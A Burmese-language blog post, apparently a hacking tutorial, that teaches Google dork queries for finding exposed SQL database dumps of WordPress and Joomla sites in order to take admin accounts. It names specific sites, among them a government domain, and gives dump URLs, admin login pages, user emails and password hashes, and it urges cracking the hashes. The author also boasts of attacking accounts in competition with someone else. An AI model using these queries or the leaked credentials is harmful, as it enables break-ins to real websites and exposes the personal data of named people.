ီDork ေတြကိုသုံးျပီး Accounts ေတြ Website ေတြကို ဘယ္လုိ ပာက္ၾကမလဲ.. ဆုိတာေလးေပ့ါ... အားလုံးဘဲ စိတ္၀င္စားလိမ့္မယ္လုိ ့ကြ်န္ေတာ္ ေမွ်ာ္လင့္ပါတယ္..
Hacking ပုိင္းကို ေလ့လာလုိ ့ နည္းနည္းေလး ၀ါေလးရလာပီဆုိ ရင္
အမ်ားစုက Dork ဆုိ တာၾကီးကို ခေလး အထာ (ခေလး အကြက္ေတြလု ိ့ ထင္ထားၾကပါ).. တကယ္တန္းေတာ့ အားလုံးက သူ ့ေနရာနဲ ့သူပါ..
Dorking ပုိင္း စိတ္၀င္စားလုိ ့စေလ့လာမယ္ဆုိရင္ေတာ့ လုိအပ္တာေလးကေတာ့...
[+] 1. ေတြးေတာ တတ္တဲ့ ဦးေႏွာက္ရွိရမယ္..
[+] 2. ျဖတ္ထုိးဥာဏ္ ေကာင္းရမယ္..
[+] 3. Hacking နဲ ့ပတ္သက္ျပီး အေတြ ့အၾကံဳ ရွိရပါမယ္...
ဒီ ၃ ခ်က္သာ သင့္မွာရွိေနရင္ Dork ေတြကို ကုိယ္ပုိင္ ဖန္တီးနုိင္မွာျဖစ္သလုိ...
ခက္ခဲမယ္ ထင္တဲ့ အရာေတြက လြယ္ကူသြားေစတတ္ပါတယ္.. (အျမဲေတာ့မပာုတ္ပါဘူး အမ်ားစု မွာေပ့ါ)
ကဲေကာင္းပီ... ကြ်န္ေတာ္ FB Group ေလးတစ္ခုမွာ ညီကို ေတြကို Hacking ဆုိင္ရာ ဗပာုသုတ ေတြ
ကြ်န္ေတာ္ ေတြ ့ၾကဳံဖူးသမွ် ေတြနဲ ့ကြ်န္ေတာ္ တတ္ထားတဲ့ပညာေလး မေတာက္တစ္ေခါက္ကို ရွဲဖူးပါတယ္.. ဒီအခ်ိန္မွာ ညီေလးတစ္ေယာက္ ၾကိဳးစားပန္းစားပာက္ေနတဲ့ဆုိဒ္တစ္ခုပါ..သူအတြက္ အေတာ္ေလး ခက္ခဲေပမယ့္ ခုနည္းနဲ ့ကြ်န္ေတာ္အတြက္ ၂ မိနစ္ ေလာက္သာၾကာသြားပါတယ္.. Admin , User:Pass ေတြ အလြယ္တကူရခဲ့ပါတယ္..
ဒါက တစ္ပုိင္းပါ.. ေနာက္တစ္ခါ Account ေတြကို လူတစ္ေယာက္နဲ ့ျပိဳင္ျပီး attack လုပ္ဖူးပါတယ္..
ဒီတုန္းကလည္း ကြ်န္ေတာ္ Dork ကုိသာ သုံးသြားတာပါ... ကြ်န္ေတာ္ သူ ့ထက္ အေကာင့္မ်ားမ်ား attack လုပ္နုိင္ဖူးပါတယ္... ဒါေတြကလည္း ခုနည္းကိုသုံးခဲ့ဖူးလုိ ့ပါဘဲ..
ကဲ စရေအာင္ဗ်ာ...
ခုနည္းကိုေတာ့ Website Hacking with dorks (0day) ေလးတစ္ခုလုိ ့ကြ်န္ေတာ္ ယူဆထားတာေလးပါ..
အရင္ဆုံး ဆုိဒ္ေတြရဲ ့ အက္မင္ User:Pass ေတြကို စလုပ္ၾကတာေပ့ါဗ်ာ..
[+] Dork: ext:sql intext:`wp_users` `user_login`, `user_pass`
ဒီေနရာမွာ ext ဆုိတာက File Extension ဆုိကုိဆုိလုိတာပါ.. အုိေက File Extension ဆုိတာဘာလဲ..
ဥပမာ.. လူအမ်ားသိတဲ့ Dota Game ဖုိင္ဆုိပါေတာ.. ဒါဆုိ သူ ့file extension က exe ပါ..
ဒါမွပာုတ္ NOtepad ဖုိင္ေတြဆုိ သူ file extension က txt ပါ...
ဒီလိုပါဘဲ..
Website အမ်ား စုမွာ.. .sql ဆုိတဲ့ File Extension ေနရာပာာလြန္စြာ အေ၇းပါလွပါတယ္..
ဘာလုိ ့လဲဆုိေတာ့ အဲ့ .sql ဆုိတဲ့ ဖုိင္တစ္ခ်ဳိ ့ပာာ ဆုိဒ္တစ္ခုလုံးကို ထိန္းခ်ဳပ္ထားတဲ့ Admin တစ္ေယာက္ရဲ ့ Data အမ်ားစု သြားေရာက္သုိေလွာင္ထားတဲ့ ေနရာမို ့လုိ ့ပါဘဲ..
Site ရဲ ့ Administrator User Name : Password ေတြက အစေပ့ါဗ်ာ..
ဒါေပမယ့္ခုနည္း ေတြကေတာ့.. Website တစ္ခုရဲ ့ Database(DB) ေတြတည္း၀င္ေရာက္ဖူးတဲ့
သူမ်ားအတြက္ ေတာ့ ပုိအဆင္ေျပနုိင္ပါတယ္...
ကဲ ခုနည္းနည္းေလးစလုိက္ရေအာင္ဗ်ာ..
[+] www.google.com ကုိသြားလုိက္ပါ...
[+] ext:sql intext:`wp_users`
ဆုိတာေလးကို ထည့္လုိက္ပါ... အားပါး... ျမင္လားေတာ့မသိဘူးဗ်
...
အားပါး ၾကိုက္တဲ့လင့္တစ္ခုကိုနုိပ္လုိက္ပါ..
ဥပမာေပးရရင္...
[+]Demo
[+] http://asia-spice.co.uk/india.sql
ကဲ သူငယ္ခ်င္းတုိ ့ျမင္ေတြ ့ရာမွာကေတာ့ ဘာေတြမွန္းမသိဘူးဆုိတဲ့ Code ေတြပါ...
ဒါေပမယ့္.. Ctrl+f နုိပ္ျပီး _users လုိ ့ထည့္ရွာလုိက္ရင္ေတြ ့၇မွာျဖစ္ပါတယ္... ေအာက္ကဥပမာ ၾကည့္တာေပ့ါ...
INSERT INTO `wp_users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES
(1, 'admin', '$P$BubDNW5YEufyKsP7Qs0yzchz8tk4ml.', 'admin', 'prabal@looogobd.com', '', '2011-02-02 14:22:20', '', 0, 'admin');
So.. So... So... "လဲလဲလဲလဲလဲလဲလဲ"
[+] http://www.asia-spice.co.uk
[+] Admin Page : http://www.asia-spice.co.uk/wp-admin
[+] User : admin
[+] Pass : $P$BubDNW5YEufyKsP7Qs0yzchz8tk4ml (MD 5 ေလးေတာ့ျဖည္ေပ့ါဗ်ာ)
ဒါေလးကေတာ့ wordpress ဆုိဒ္ကို လုပ္သြားတာေလးပါ... ...
အုိေက Joomla Website ကိုလည္း လုပ္ၾကည့္ရေအာင္ဗ်ာ.. ေဒါ့ေလး စေရးၾကမယ္..
wordpress ဆုိဒ္ဆုိ wp_users လုိ ့သုံးပါတယ္...
Joomla ဆုိဒ္မွာဆုိရင္ jos_users လုိ ့သုံးပါတယ္.. ဒီေတာ့သင့္ ဦးေႏွာက္ကို အရင္စမ္းသပ္ပါ....
Dork ကုိ သင္ဘယ္လုိ ေရးရမလဲဆုိတာကို... စမ္းသပ္ၾကည့္ပါ.. ျပီးမွ ေအာက္က Dork ကုိၾကည့္ပါ...
[+] Dork : ext:sql intext:`jos_users`
အုိေက ပုံမွန္တုိင္းပါဘဲ.. မိမိ စိတ္ၾကိုက္လင့္တစ္ခုကို ရယူလိုက္ပါ..
ဥပမာေပးရရင္..ေတာ့ ေအာက္ကလင့္ေပ့ါဗ်ာ..
[+] http://www.nape.gov.bd/ssdemo_nape.sql
ဆုိပါေတာ့ Ctrl+f ကုိနုိပ္ျပီး table jos_users လုိ ့ထည့္ရွာလုိက္ပါ..
အားပါးေအာက္ဆုံးနားေလးမွာေတြ ့ေနရပါျပီ...
ျမင္လားေတာ့မသိဘူးဗ် ...
INSERT INTO `jos_users` (`id`, `name`, `username`, `email`, `password`, `usertype`, `block`, `sendEmail`, `gid`, `registerDate`, `lastvisitDate`, `activation`, `params`) VALUES
(62, 'Administrator', 'admin', 'abc@yahoo.com', '1c593b301f5b54004f59dec08f966bcb:DDg8EdtaoX2M4ta6zAkkriJcbzBchX5a', 'Super Administrator', 0, 1, 25, '2011-11-30 15:36:33', '2011-12-11 14:37:58', '', 'admin_language=\nlanguage=\neditor=\nhelpsite=\ntimezone=0\n\n'),
(63, 'Shuvo', 'ssshuvo', 'shuvo@yahoo.com', '82bf62a9f84ca409800aafca388ececd:4Etey3jMyOllDVqggYvAmrG9XLShFoHQ', 'Registered', 0, 0, 18, '2011-12-01 10:19:55', '2011-12-01 10:39:43', '96b8a810f2b3a2c3fe34c9938f1453ed', '\n');
အေတာင့္လုိက္ေတြ ထြက္လာပါတယ္..
[+] Demo
[+] http://www.nape.gov.bd
[+] http://www.nape.gov.bd/administrator/
[+] User : abc@yahoo.com / Pass: 1c593b301f5b54004f59dec08f966bcb:DDg8EdtaoX2M4ta6zAkkriJcbzBchX5a (MD5)
[+] User : shuvo@yahoo.com / Pass: 82bf62a9f84ca409800aafca388ececd:4Etey3jMyOllDVqggYvAmrG9XLShFoHQ (MD5)
ကဲ... ျမင္တဲ့အတုိင္းဘဲဗ်ာ.. ခုျပသြားတာက wordpress / Joomla တုိ ့ဘဲျဖစ္ပါတယ္...
ဒါေလးက လူအမ်ားစုသိေတာ့ ဥပမာ ေပးရတာပိုအဆင္ေျပမယ္ထင္လုိ ့ပါ..
တစ္ျခားဆုိဒ္ေတြကိုလည္း အဲ့လုိ ပါဘဲ... သူငယ္ခ်င္းတုိ ့ကို ကြ်န္ေတာ္ေျပာခဲ့သလိုေပ့ါဗ်ာ...
ဦးေႏွာက္ေပ့ါ အေပၚက အခ်က္သုံးခ်က္ နဲ ့ သာဆုိရင္ မီးပြင့္ထြက္ေအာင္ ပာက္လုိ ့ရပါတယ္...
Web hacking ပုိင္းေလးျပီးျပီ ဆုိေတာ့ Accounts ေတြကို ပာက္ၾကည့္ရေအာင္ဗ်ာ..
Special G:_ ext:sql intext:`*_users`
:')
အစကေတာ့ Accounts & Website Hacking with dork ဆုိပီး e-book ေလးေရးေပးမလုိ ့ပါဘဲဗ်ာ..
ကြ်န္ေတာ့ စာအုပ္ေလးကို ညီကို တစ္ခ်ဳိ ့ကိုေပးဖတ္လုိက္ေတာ့ လုိအပ္ခ်က္ေလးေတြရွိေနလုိ ့ဘေလာ့အေနနဲ ့သာ
တင္ေပးလုိက္ရပါတယ္ခင္ဗ်ာ...
ေပ်ာ္ရႊင္ပါေစ ကြ်န္ေတာ္လည္း ဆက္လက္ ၾကိဳးစားေနအုံးမွာပါ..
အားေပးၾကပါအုံးလုိ ့ ဖိတ္ေခၚခ်င္ပါတယ္..
ref;minsoeyarsar
Comments
Post a Comment